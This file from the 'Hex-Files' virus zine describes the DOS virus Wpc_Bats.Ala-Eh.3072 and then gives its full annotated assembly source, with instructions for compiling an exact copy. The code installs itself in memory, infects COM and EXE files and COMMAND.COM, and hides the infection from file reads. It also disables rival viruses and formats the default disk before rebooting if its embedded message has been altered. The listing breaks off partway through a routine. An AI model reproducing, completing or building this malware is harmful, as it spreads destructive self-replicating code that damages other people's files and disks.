Copy Link
Add to Bookmark
Report
Hexfiles Issue 4 File 009
HEX-FILES No. 4 File 009
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Name : Wpc_Bats.Ala-Eh.3072
Author : A.R.Jr
Origin : Lipa City, Philippines
Resides on top of memory which is allocated through DOS. The memory
allocated is 3952 bytes.
Hooks Int 16h (Function 00h), Int 1Ch and Int 21h (Functions 3Ch,
3Dh, 3Eh, 3Fh, 4202h, 4B00h, 4B01h, 4B03h and 6Ch).
Uses tunneling technique for Int 21h and uses DOS to hook the other
two interrupts.
Recognizes memory by checking the last Int 21h handler it could find
for the first 20 bytes its Int 21h handler. Checks also for the
presence of the Int 21h handler of Sayha and DieHard which it
effectively disables.
Infects com and exe programs.
The virus length is 3072 bytes and its infective length is 3072 to
3087 bytes.
Virus is appended to host programs.
Virus is stealth.
Recognizes programs that had already been infected. Checks whether
all bits of FileTime.Second are set. Further verifies an infection by
checking for 20 bytes of the data for its graphics payload.
Payloads:
Randomly displays " a l a - e h !".
Draws, in graphics mode, "ALA-EH!" superimposed in "ALF" in the
middle of the screen an hour after it has gone resident.
Displays the text found at the end of the virus on F1 keypresses.
ÜÜÜÜÜ Ü ÜÜÜÜÜ ÜÜÜÜÜ Ü Ü
³ÛÜÜÜÛ³Û ³ÛÜÜÜÛ ÜÜ ³ÛÜÜÜ ³ÛÜÜÜÛ
³ÛÄÄ¿Û³ÛÜÜÜܳÛÄÄ¿Û ³ÛÜÜÜܳÛÄÄ¿Û
ÀÙ ÀÙÀÄÄÄÄÙÀÙ ÀÙ ÀÄÄÄÄÙÀÙ ÀÙ
ÄÄÄÄÄÄ A.R.Jr W P C B A T S ÄÄÄÄÄÄÄ
Checks for alteration/corruption of the above message. If found,
shows the altered/corrupted message, formats disk in the default
drive and executes a reboot.
ÄÄ WPCA3072.ASM STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
;±*WARNING*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*WARNING*
;±*WARNING*± ±*WARNING*
;±*WARNING*± VIRUS CONTAINS DESTRUCTIVE CODES ±*WARNING*
;±*WARNING*± ±*WARNING*
;±*WARNING*± VIRUS DOES INTENTIONAL DAMAGE ±*WARNING*
;±*WARNING*± ±*WARNING*
;±*WARNING*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*WARNING*
;±*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± ±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± HEX-FILES No 4 ±±±
;±±±±±± ±±±±±±±±±±± ±±±
;±±±±±± Virus Name: Wpc_Bats.Ala-Eh.3072 ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±± Author : A.R.Jr. ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±± Origin : Lipa City, Philippines ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±± ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±± ±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±± Program listing created by Putoksa Kawayan ±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±± ±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±± ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±± COMPILING INSTRUCTION ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±± ~~~~~~~~~~~~~~~~~~~~~ ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±± ±±±
;±±± This virus was originally compiled in TASM 2.0 and could only be ±±±
;±±± compiled without correction in TASM. This should be compiled in ±±±
;±±± one pass which means that nops should be preserved. ±±±
;±±± ±±±
;±±± MASM 5.0 would generate a phase error message when this is ±±±
;±±± compiled. To suppress the error, you would have to add a size ±±±
;±±± override to this instruction: ±±±
;±±± ±±±
;±±± test [CommandComFlag],1 ±±±
;±±± ;<--------------------------- there should be a NOP here ±±±
;±±± ±±±
;±±± This should be coded as: ±±±
;±±± ±±±
;±±± test byte ptr [CommandComFlag],1 ±±±
;±±± nop ±±±
;±±± ±±±
;±±± This would enable MASM to compile the source. Setting a size ±±±
;±±± override would prevent MASM from a generating a NOP right after ±±±
;±±± the instruction. To get an exact copy of the virus, a NOP should ±±±
;±±± be coded as above. Otherwise, you would be creating a new ±±±
;±±± variant of the virus. ±±±
;±±± ±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;
DTA struc
_dReserved db 21 dup (?) ; reserved for next search
_dAttribute db ? ; file attribute
_dTimeStamp dw ? ; file time stamp
_dDateStamp dw ? ; file date stamp
_dLoLen dw ? ; length of file low word
_dHiLen dw ? ; length of file high word
_dFileName db 13 dup (0) ; filename of matched file
DTA ends
ExeHeader struc
_ExeID dw ? ; MZ exe identifier
_ExeMod dw ? ; bytes on last 512 blocks
_ExeBlocks dw ? ; number of 512 blocks (pages)
_ExeRelTab dw ? ; number of relocatable items
_ExeHedSize dw ? ; length in paragraphs of exe header
_ExeMinAlloc dw ? ; minimum memory required in paragraphs
_ExeMaxAlloc dw ? ; maximum memory required in paragraphs
_ExeStkSeg dw ? ; displacement for stack segment in paragraphs
_ExeStkPt dw ? ; initial value of stack pointer
_ExeCxSum dw ? ; checksum value
_ExeCodPt dw ? ; offset if program entry point
_ExeCodSeg dw ? ; displacement for code segment in paragraphs
_ExeRelFrst dw ? ; first relocatable item entry
ExeHeader ends
WpcBatsAlaEh3072 segment 'code'
assume cs:WpcBatsAlaEh3072, ds:WpcBatsAlaEh3072
Ivt21 equ 21h*4
MotorState equ 3fh
Environment equ 2ch
MemRequired equ ((offset WpcStackPt - offset Relocator+15)/16)+4
VirLen equ offset Timer - offset Relocator
AsciizLen equ 62
MemAllocMethod equ ReturnPoint
ScrWide equ 80
ScrHigh equ 24
org 100h
Relocator:
mov ax,cs
add ax,0
SegVirus equ word ptr $-2
push ax
mov bx,offset Dropper ; dropper would change this
RelocToVir equ word ptr $-2
push bx
retf ; relocate to virus
DecryptEntryCode: ; decrypt virus entry code
mov dx,es
mov ax,cs
xor di,di
mov ds,ax
mov si,offset EntryCodeMaskBegin ; begin decrypting here
std
cli
mov ss,ax
mov sp,si
EntryCodeDecryptKeyReset:
mov bx,offset EntryCodeMaskEnd
EntryCodeDecryptLoop:
cmp bx,offset EntryCodeMaskKeyEnd
EntryCodeMaskKeyEnd equ $-2
je EntryCodeDecryptKeyReset
dec bx
mov es,di
inc di
mov bp,sp
shl di,1
shl di,1
lodsb
xor al,[bx]
mov [bp],al ; no trace!
xor es:[di+2],al
sub di,4
dec sp
cmp sp,offset EntryCodeMaskEnd ; end decrypting here
je EntryCodeMaskEnd
or di,di
jz EntryCodeDecryptLoop
EntryCodeMaskEnd:
mov sp,offset WpcStackPt
sti
cld
mov es,dx
mov cs:[Psp],es
push cs
pop ds
xor bx,bx
mov es,bx
mov [TempInt21Segment],bx
mov si,offset AlaehMessage ; check for patched message
CheckAlaehMessage:
lodsb
add bl,al
adc bh,0
cmp al,13
jne CheckAlaehMessage
cmp bx,660bh
AlaehMessageCxSum equ word ptr $-2
jne ShowMessTrashDisk ; if altered, make them pay!!!
mov word ptr [TempInt21Offset],Ivt21
les bx,es:[Ivt21] ; tunnel int 21
mov [Int21Offset],bx
mov [Int21Segment],es
RestartTunnel:
mov cx,128 ; loop count
CheckIfFarJump:
cmp byte ptr es:[bx],0eah ; far jump
jne LookForCsOverride
inc bx
mov [TempInt21Offset],bx ; save vector loc
mov [TempInt21Segment],es
les bx,es:[bx]
mov [Int21Offset],bx ; save vector
mov [Int21Segment],es
jmp CheckIfFarJump
ShowMessTrashDisk:
call ShowAlaehGraphics ; show altered message
mov ah,19h ; and format disk
int 21h
mov dl,al
mov ah,5
mov dh,0
mov ch,0
int 13h
int 19h ; reboot
LookForCsOverride:
inc bx
cmp byte ptr es:[bx-1],2eh ; check for cs override
loopnz LookForCsOverride
jcxz CheckSWvx
cmp word ptr es:[bx],1effh ; indirect far jump
je GetLocVector
cmp word ptr es:[bx],2effh ; indirect far call
loopnz LookForCsOverride
jcxz CheckSWvx
GetLocVector:
mov di,es:[bx+2] ; get loc vector
mov [TempInt21Offset],di ; save hook loc
mov [TempInt21Segment],es
les bx,es:[di]
mov [Int21Offset],bx ; save int 21
mov [Int21Segment],es
jmp RestartTunnel
ZapSWint21:
xor ah,ah
lodsb ; get loc of vector
mov di,dx
mov si,di
add si,ax
mov ax,es
mov [TempInt21Segment],ax
mov ds,ax
mov al,0eah ; and steal it
cli
stosb ; zap sayha/diehard int 21 handler
mov cs:[TempInt21Offset],di
lodsw
stosw
mov bx,ax
mov cs:[Int21Offset],ax
lodsw
stosw
sti
mov es,ax
mov cs:[Int21Segment],ax
push cs
pop ds
jmp RestartTunnel
SigSayha db 0fbh,9ch,50h,1eh,0eh,1fh,86h,0c4h ; sig string
db 6eh ; loc of vector from
SigDieHard db 0fbh,9ch,50h,51h,86h,0c4h,33h,0c9h ; handler entry point
db 0a5h ; unused by this variant
CheckSWvx:
les di,[Int21]
mov dx,di
mov si,offset SigSayha ; checks for sayha and die hard
mov cx,4 ; it would disable the int 21
repe cmpsw ; handler of these viruses
je ZapSWint21 ; if found
mov si,offset SigDieHard
mov di,dx
mov cx,4
repe cmpsw
je ZapSWint21
mov si,offset Int21Handler ; check if memory resident
mov di,dx
mov cx,10
repe cmpsw
je ExecuteHost
mov ah,30h
int 21h
cmp al,3 ; dos version < 3
jb ExecuteHost
mov es,[Psp]
mov ax,5800h ; save mem allocation strategy
int 21h
mov [MemAllocMethod],ax
mov ah,48h
mov bx,-1
int 21h ; get free mem
cmp ax,7
je ExecuteHost
cmp bx,MemRequired ; enough mem?
ja CheckMemAllocStrat
mov ah,4ah
mov bx,-1
int 21h ; allocate all mem
cmp ax,7
je ExecuteHost
sub bx,MemRequired+1 ; set aside mem for vx
jnc ReserveMemory
ExecuteHost:
call MaskSavedHostData ; decrypt host data
mov si,offset SavedHost
mov bx,[Psp]
mov es,bx
cmp word ptr [SavedHost],'ZM' ; is exe?
jne ExecuteComHost
add bx,16 ; set up exe host
mov ax,_ExeStkSeg[SavedHost]
add ax,bx
cli
mov ss,ax
mov sp,_ExeStkPt[SavedHost]
sti
add bx,_ExeCodSeg[SavedHost]
push bx
push _ExeCodPt[SavedHost]
mov ds,[Psp]
retf ; and execute host exe
ReserveMemory:
mov ah,4ah ; reserve mem for virus
int 21h
jc ExecuteHost
mov ax,es:[2]
sub ax,MemRequired+1 ; reset top of mem
jb CheckMemAllocStrat
mov es:[2],ax
CheckMemAllocStrat:
mov bx,2
cmp [MemAllocMethod],bx ; is alloc strat last fit?
jb SwapMemAllocStrat ; if no, then try last fit
xor bx,bx ; if yes, use first fit
SwapMemAllocStrat:
mov ax,5801h ; swap alloc strat
int 21h
mov bx,MemRequired ; allocate mem for virus
mov ah,48h
int 21h
mov dx,ax
mov ax,5801h ; restore alloc strat
mov bx,[MemAllocMethod]
int 21h
cmp dx,7
je ExecuteHost
mov es,dx ; copy virus to allocmem
xor di,di
mov si,offset Relocator
mov cx,(offset VirusDta - offset Relocator)/2
cld
repe movsw
sub dx,16
mov ds,dx
cli
mov ss,dx
mov sp,offset WpcStackPt
sti
push dx
mov ax,offset SetToGoTsr
RelocToMem equ word ptr $-2
push ax
retf ; relocate to alloc mem
ExecuteComHost:
cli ; restore host com
mov ss,bx
mov sp,-2
sti
push bx
mov di,100h
push di
movsw
movsb
mov ds,bx
retf ; and execute it
SetToGoTsr:
call MaskInt21Handler ; decrypt int 21 handler
mov word ptr ds:[100h-15],8 ; set os as mcb owner
mov word ptr [RelocToVir],offset DecryptEntryCode ; init vir offsets
mov word ptr [RelocToMem],offset SetToGoTsr
mov ax,3516h
int 21h
mov [Int16Offset],bx ; save int 16
mov [Int16Segment],es
mov al,1ch
int 21h
mov [Int1cOffset],bx ; save int 1c
mov [Int1cSegment],es
mov ah,0fh
int 10h
mov [VideoMode],al ; save video mode
mov word ptr [Timer],-16 ; set timer to one hour
mov ax,2516h
mov dx,offset Int16Handler
int 21h ; hook int 16
mov al,1ch
mov dx,offset Int1cHandler
int 21h ; hook int 1c
les di,[TempInt21] ; load int 21 hook loc
mov ax,offset Int21Handler
cli
stosw ; hook int 21
mov ax,cs
stosw
sti
push cs
pop es
mov cx,5 ; initialize handle table
mov di,offset HandleTable
mov ax,-1
InitHandleTable:
stosw
add di,AsciizLen
loop InitHandleTable
call MaskSavedHostData ; decrypt saved host data
mov si,offset SavedHost
mov bx,[Psp]
mov cx,bx
cmp word ptr [SavedHost],'ZM' ; is it exe?
jne HostIsCom
add si,_ExeCodPt ; set up exe host
mov di,offset HostIp
movsw
lodsw
add bx,16
add ax,bx
stosw
sub si,_ExeRelFrst-_ExeStkSeg
lodsw
add bx,ax
lodsw
EntryCodeMaskBegin:
call InfectCommandCom ; try to infect command.com
mov es,cx
mov ds,cx
cli
mov ss,bx
mov sp,ax
sti ; execute host exe
db 0eah
HostIp dw ?
dw ?
HostIsCom:
mov es,bx ; restore host com
mov di,100h
movsw
movsb
call InfectCommandCom ; try to infect command.com
mov ds,bx
cli
mov ss,bx
mov sp,-2
sti ; execute host com
db 0eah
dw 100h
Psp dw ?
InfectCommandCom:
call SaveRegisters
mov si,offset EntryCodeMaskBegin ; encrypt entry codes start
std
MaskEntryCodeKeyReset:
mov bx,offset EntryCodeMaskEnd
MaskEntryCodeLoop:
cmp bx,offset EntryCodeMaskKeyEnd
je MaskEntryCodeKeyReset
dec bx
lodsb
xor al,[bx]
mov [si+1],al
cmp si,offset EntryCodeMaskEnd ; encrypt entry codes end
jne MaskEntryCodeLoop
test byte ptr [CommandComFlag],1 ; is host command.com?
nop
;<-------------------------------------- there should be a NOP here
jnz HostIsCommandCom ; yes. then exit
mov es,[Psp]
mov es,es:[Environment] ; get path of exec host
xor di,di
xor al,al
cld
mov cx,-1
GetStartOfFileName:
repne scasb
scasb
jne GetStartOfFileName
mov ax,es:[di+2]
mov di,offset VirusAsciiz
push cs
pop es
cmp ah,':' ; is there a drive letter
jne SearchInDefaultDrive
stosw ; then use it!
SearchInDefaultDrive:
mov si,offset CommandCom
mov cx,6
repe movsw
call Infect ; infect command.com
HostIsCommandCom:
call RestoreRegisters ; done
call MaskInt21Handler
ret
Int21HandlerKeyReset:
MaskInt21Handler: ; decrypt/encrypt part of int 21 handler
cld
pushf
call SaveRegisters
push bp
xor bp,bp
mov si,offset MaskInt21HandlerBegin ; start masking here
std
MaskInt21HandlerKeyReset:
mov bx,offset MaskInt21HandlerKeyBegin
MaskInt21HandlerLoop:
cmp bx,offset MaskInt21HandlerKeyEnd
MaskInt21HandlerKeyEnd equ $-2
je MaskInt21HandlerKeyReset
dec bx
push cs
pop ds
lodsb
xor al,[bx]
mov [si+1],al
mov ds,bp
xor ds:[6],al ; no trace
cmp si,offset AlaehPrompt ; stop masking here
je MaskInt21HandlerDone
or bp,bp
jz MaskInt21HandlerLoop
MaskInt21HandlerKeyBegin equ $-1
MaskInt21HandlerDone:
pop bp
call RestoreRegisters
popf
ret
RestoreRegisters: ; pop all registers
pop cs:[ReturnPoint]
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jmp cs:[ReturnPoint]
VerifyInfection:
mov si,offset StealthBuffer + (offset HorizontalData-offset SavedHost)
mov di,offset HorizontalData
mov cx,10
repe cmpsw ; verify if really infected
ret
SaveRegisters: ; save all registers
pop cs:[ReturnPoint]
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
jmp cs:[ReturnPoint]
IsFileHandleSaved:
mov ax,cs
mov es,ax
mov ds,ax
mov si,offset HandleTable
mov cx,5 ; check entry count
CheckNextEntry:
lodsw
cmp ax,bx ; is handle saved?
je HandleIsSaved
add si,AsciizLen ; check next entry
loop CheckNextEntry
stc ; not saved
ret
HandleIsSaved:
push si
mov di,offset VirusAsciiz ; copy asciiz of handle owner
CopySavedAsciiz:
lodsb
stosb
or al,al
jnz CopySavedAsciiz
pop si
clc
ret
MaskSavedHostData: ; encrypt/decrypts saved host data
mov si,offset SavedHost
MaskSavedHostKeyReset:
mov di,offset MaskSavedHostKeyBegin
MaskSavedHostLoop:
cmp di,offset MaskSavedHostKeyEnd
MaskSavedHostKeyEnd:
je MaskSavedHostKeyReset
lodsb
xor al,[di]
dec di
mov [si-1],al
MaskSavedHostKeyBegin:
cmp si,offset FileSlack
jne MaskSavedHostLoop
ret
HideInfectionOnRead:
call RestoreRegisters
popf
pop cs:[ReadCallerOffset]
pop cs:[ReadCallerSegment]
popf
call UseDos ; execute orig read call
call MaskInt21Handler
jc FailedHideInfectionOnRead
pushf
call SaveRegisters
push ds
pop es
push cs
pop ds
cmp cx,24 ; is read 24 bytes
jb LenWithInLimit
mov cx,24 ; if more, use 24
LenWithInLimit:
mov si,offset SavedHost
mov di,dx
cld
repe movsb ; return original host data
call RestoreRegisters
popf
FailedHideInfectionOnRead:
db 0eah
ReadCallerOffset dw ? ; return to caller
ReadCallerSegment dw ?
ReadFileHandler:
call SaveRegisters
call IsFileHandleSaved
jc PopaPriorToExit
mov al,1
call MovePointerZeroLoHi ; get current ptr loc
push ax
or ax,dx ; are we at start of file
pop ax
jnz PopaPriorToExit
call MaskInt21Handler
call GetInfectedFileSavedHost
pushf
call MovePointerStart
popf
jc HideCodePriorToPopA
call VerifyInfection ; verify
je HideInfectionOnRead ; if infected, stealth it
HideCodePriorToPopA:
call MaskInt21Handler
PopaPriorToExit:
call RestoreRegisters
PassToOldDos:
popf ; execute DOS
push cs:[Int21Segment]
push cs:[Int21Offset]
retf
CloseFileHandler:
call SaveRegisters
call IsFileHandleSaved ; is handle saved
jc PopaPriorToExit
mov word ptr [si-2],-1 ; free handle table entry
call RestoreRegisters
popf
pop cs:[CloseCallerOffset]
pop cs:[CloseCallerSegment]
popf
call UseDos ; execute close file
call MaskInt21Handler
call Infect ; and infect it
call MaskInt21Handler
db 0eah ; return to caller
CloseCallerOffset dw ?
CloseCallerSegment dw ?
StealthFunctions:
cmp bx,1eh ; handle > 30
ja PassToOldDos
cmp ah,3fh ; read file
je ReadFileHandler
cmp ah,3eh ; close file
je CloseFileHandler
cmp al,2 ; ptr to eof?
jne PassToDos
push dx
or dx,cx ; is it move to eof?
pop dx
jnz PassToDos
call SaveRegisters
call IsFileHandleSaved ; is handle saved?
jc PopaPriorToExit
call MaskInt21Handler
call GetInfectedFileSavedHost
pushf
mov al,2
call MovePointerZeroLoHi ; get eof
popf
jc HideCodePriorToPopA
call VerifyInfection ; is file really infected
jne HideCodePriorToPopA
call RestoreRegisters
popf
pop cs:[PointerCallerOffset]
pop cs:[PointerCallerSegment]
popf
call UseDos ; execute caller request
call MaskInt21Handler
pushf
add word ptr cs:[FileSlack],VirLen
sub ax,cs:[FileSlack] ; reset eof to orig eof
sbb dx,0
popf
db 0eah
PointerCallerOffset dw ? ; return to caller
PointerCallerSegment dw ?
Int21Handler:
pushf
sti
cld
cmp ah,3eh ; close file
je StealthFunctions
cmp ah,3fh ; read file
je StealthFunctions
cmp ah,42h ; move file pointer
je StealthFunctions
cmp ah,4bh ; exec
je InfectFunctions
cmp ah,6ch ; create/open
je InfectFunctions
cmp ah,3dh ; open file
je InfectFunctions
cmp ah,3ch ; create file
je InfectFunctions
PassToDos:
popf ; send it to dos
push cs:[Int21Segment]
push cs:[Int21Offset]
retf
InfectFunctions:
call SaveRegisters
cmp ah,6ch ; if 6c, asciiz is in si
je SkipRegisterSwap
mov si,dx
SkipRegisterSwap:
push cs
pop es
mov di,offset VirusAsciiz ; copy asciiz
mov cx,64
CopyFileNameToAsciiz:
lodsb
stosb
or al,al
loopnz CopyFileNameToAsciiz
jcxz DoneMatch ; check for exe/com
mov ax,es:[di-4]
or ax,2020h
mov dl,es:[di-2]
or dl,20h
cmp ax,'xe'
jne CheckIfCom
cmp dl,'e'
je DoneMatch
CheckIfCom:
cmp ax,'oc'
jne DoneMatch
cmp dl,'m'
DoneMatch:
call RestoreRegisters
jne PassToDos
popf
call MaskInt21Handler
cmp ah,4bh ; exec?
je ExecHandler
cmp ah,3dh ; file open
je OpenFileHandler
cmp ah,3ch ; create file
je CreateFileHandler
cmp dx,0101h ; check 6c action flag
je ExecLoadHandler
cmp dx,0112h
je CreateFileHandler
OpenFileHandler:
call StealthRestoreFile ; stealth it
CreateFileHandler:
pop cs:[Int21CallerOffset]
pop cs:[Int21CallerSegment]
popf
call UseDos ; execute call
call MaskInt21Handler
jc ReturnToCaller
pushf
call SaveRegisters
mov bx,cs
mov ds,bx
mov es,bx
mov cx,5
mov di,offset HandleTable ; check for unused handle table entry
LookForFreeHandleEntry:
cmp word ptr [di],-1 ; is it free?
je FoundFreeEntry
add di,AsciizLen+2
loop LookForFreeHandleEntry
jmp short HandleTableIsFull
FoundFreeEntry:
stosw
mov si,offset VirusAsciiz ; save asciiz
SaveAsciizToHandleTable:
lodsb
stosb
or al,al
jnz SaveAsciizToHandleTable
HandleTableIsFull:
call RestoreRegisters
popf
ReturnToCaller:
db 0eah ; return to caller
Int21CallerOffset dw ?
Int21CallerSegment dw ?
ExecLoadHandler:
call Infect ; replicate
PreparaHideAndExit:
call MaskInt21Handler
ExecUnknHandler:
push cs:[Int21Segment] ; and execute call
push cs:[Int21Offset]
retf
ExecHandler:
cmp al,3 ; load overlay
je ExecOverlayHandler
cmp al,1 ; load debug
ja ExecUnknHandler
cmp al,0 ; load execute
je ExecLoadHandler
call StealthRestoreFile ; stealth it
pop cs:[ExecCallerOffset] ; execute call
pop cs:[ExecCallerSegment]
popf
call UseDos
call Infect ; and infect it
call MaskInt21Handler
db 0eah
ExecCallerOffset dw ? ; return to caller
ExecCallerSegment dw ?
;------------------------------------------------------------------
; this block has been disabled by the author. maybe he was
; experimenting on something and decided to trash it but forgot
; to delete it. :)
;------------------------------------------------------------------
call SaveRegisters
mov ax,3d00h
call UseDos
jc PopaAndExit
mov bx,ax
mov ax,cs
mov ds,ax
mov es,ax
call GetInfectedFileSavedHost
jc PopaAndExit
call VerifyInfection
jne PopaAndExit
mov ah,3eh
call UseDos
push bp
mov bp,sp
mov di,[bp+2]
mov es,[bp+12]
add di,18
mov si,offset SavedHost[_ExeStkSeg]
movsw
movsw
add si,2
movsw
pop bp
;----------------------------- end of disabled block --------------
PopaAndExit:
call RestoreRegisters
jmp PreparaHideAndExit
ExecOverlayHandler:
pop cs:[LoadCallerOffset] ; execute call
pop cs:[LoadCallerSegment]
popf
call Infect ; and infect it
call MaskInt21Handler
call UseDos
db 0eah ; return to caller
LoadCallerOffset dw ?
LoadCallerSegment dw ?
SavedHost dw 12 dup (?)
FileSlack dw ?
HorizontalData dw 178,109,258,109,218,114,378,109,335,80,335,109,335,114
VerticalData dw 80,210,80,220,80,260,80,337,80,380,80,410
AlaehPrompt db 1,' a l a - e h ! '
db 'anti sw' ;<------- not displayed
StealthRestoreFile:
pushf
sti
cld
call SaveRegisters
call PrepareToInfectFile
jc CleanUp
mov ax,word ptr _dTimeStamp[VirusDta]
and al,1fh
cmp al,1fh ; is it infected
jne CleanUp
mov ax,4301h
mov cx,20h ; make file write enabled
call UseDos
jc CleanUp
mov ax,3d02h ; open it
call UseDos
jc RestoreAttribBeforeCleanUp
mov bx,ax
call GetInfectedFileSavedHost
jc CloseTheFile
call VerifyInfection ; do second check
jne CloseTheFile
call MovePointerStart
mov cx,3
cmp word ptr [SavedHost],'ZM' ; is file exe?
jne TargetIsCom
mov cx,24
TargetIsCom:
mov ah,40h
mov dx,offset SavedHost
call UseDos ; restore host begin codes
mov cx,word ptr _dHiLen[VirusDta]
mov dx,word ptr _dLoLen[VirusDta]
add word ptr [FileSlack],VirLen
sub dx,[FileSlack]
sbb cx,0
xor al,al
call MovePointer
xor cx,cx ; restore host orig len
mov ah,40h
call UseDos
mov cx,word ptr _dTimeStamp[VirusDta]
mov dx,word ptr _dDateStamp[VirusDta]
mov ax,5701h
and cl,0e0h ; clear seconds mark
call UseDos
CloseTheFile:
mov ah,3eh ; done
call UseDos
RestoreAttribBeforeCleanUp:
call RestoreFileAttribute
CleanUp:
call ShowAlaehPrompt ; show alaeh
call RestoreDtaErrInt
call RestoreRegisters
popf
ret
Infect:
pushf
sti
cld
call SaveRegisters
call PrepareToInfectFile
jc CleanUp
mov ax,4301h ; clear attrib
mov cx,20h
call UseDos
jc CleanUp
mov ax,3d02h ; open file
call UseDos
jc RestoreAttribBeforeCleanUp
mov bx,ax
mov ax,word ptr _dTimeStamp[VirusDta]
and al,1fh
cmp al,1fh ; check infect mark
jne isCommand
call GetInfectedFileSavedHost
jc CloseTheFile
call VerifyInfection ; is file infected?
je CloseTheFile
call MovePointerStart
isCommand:
mov [CommandComFlag],1
;<-------------------------------------- there should be a NOP here
mov di,offset VirusDta[_dFileName]
mov si,offset CommandCom
mov cx,6
repe cmpsw ; is command.com?
je isCommandCom
mov [CommandComFlag],0
;<-------------------------------------- there should be a NOP here
isCommandCom:
mov ah,3fh
mov cx,24
mov dx,offset ReadBuffer ; read from host begin
call UseDos
jc CloseTheFile
mov si,offset ReadBuffer
call SaveHostFileData
mov ax,word ptr _dLoLen[VirusDta]
call GetFileSlack
mov [FileSlack],dx
mov al,2
call MovePointerZeroHi ; move ptr to aligned eof
mov cl,4
cmp word ptr [ReadBuffer],'ZM' ; is file exe
je TargetIsExe
shr ax,cl ; set up com jump to virus
mov [SegVirus],ax
shl ax,cl
sub ax,3
mov byte ptr [ComJumpByte],0e9h
mov [ComJumpDisp],ax
call WriteVirus
jnc SetWriteToBeginOfFile
jmp DoneInfect
;<-------------------------------------- there should be a NOP here
TargetIsExe:
cmp dx,0
ja ExeFileLenOk
cmp ax,527 ; check min exe file length
jb DoneInfect
ExeFileLenOk:
mov word ptr _dLoLen[VirusDta],ax ; setup virus header
mov si,_ExeHedSize[ReadBuffer]
shl si,cl
sub ax,si
sbb dx,0
mov _ExeCodPt[ReadBuffer],ax
shr ax,cl
sub ax,16
mov [SegVirus],ax
mov ax,dx
mov cx,1000h
mul cx
mov _ExeCodSeg[ReadBuffer],ax
add ax,[SegVirus]
mov _ExeStkSeg[ReadBuffer],ax
mov word ptr _ExeStkPt[ReadBuffer],offset WpcStackPt
call WriteVirus
jc DoneInfect
mov dx,word ptr _dHiLen[VirusDta]
mov ax,word ptr _dLoLen[VirusDta]
add ax,VirLen
adc dx,0
mov cx,200h
div cx
or dx,dx
jz PageAligned
inc ax
PageAligned:
mov _ExeMod[ReadBuffer],dx
mov _ExeBlocks[ReadBuffer],ax
mov word ptr _ExeMinAlloc[ReadBuffer],123h
SetWriteToBeginOfFile:
call MovePointerStart
mov dx,offset ReadBuffer
mov cx,24
mov ah,40h
call UseDos ; write to beginning of file
DoneInfect:
mov cx,word ptr _dTimeStamp[VirusDta]
mov dx,word ptr _dDateStamp[VirusDta]
mov ax,5701h
or cl,1fh ; set seconds mark
call UseDos
mov ah,3eh ; done
call UseDos
call RestoreFileAttribute
call ShowAlaehPrompt ; show alaeh
call RestoreDtaErrInt
call RestoreRegisters
popf
ret
Int24Handler:
mov al,3 ; error int handler
iret
ShowAlaehPrompt:
mov ah,2ch
call UseDos
cmp dl,10 ; make display random
je ShowIt
cmp dl,24
je ShowIt
ret
ShowIt:
mov si,offset AlaehPrompt ; show it
mov cx,16
ShowNextChar:
lodsb
mov dl,al
mov ah,2
call UseDos
loop ShowNextChar
ret
CommandCom db 'COMMAND.COM',0
GetFileSlack: ; determine bytes to pad
xor dx,dx
mov cx,16
div cx
or dx,dx
jz NoPadNeeded
sub dx,cx
neg dx
NoPadNeeded:
ret
RestoreFileAttribute:
xor ch,ch
mov cl,_dAttribute[VirusDta]
mov ax,4301h
mov dx,offset VirusAsciiz
call UseDos
ret
RestoreDtaErrInt:
mov ah,1ah
lds dx,cs:[ActiveDta] ; restore active dat
call UseDos
mov ax,2524h
lds dx,cs:[Int24] ; restore error int
call UseDos
ret
PrepareToInfectFile:
mov si,cs
mov ds,si
mov ax,3524h
call UseDos
mov [Int24Offset],bx ; save error int
mov [Int24Segment],es
mov ah,2fh
call UseDos
mov [DtaOffset],bx ; save active dta
mov [DtaSegment],es
mov es,si
mov ax,2524h
mov dx,offset Int24Handler
call UseDos ; hook err int
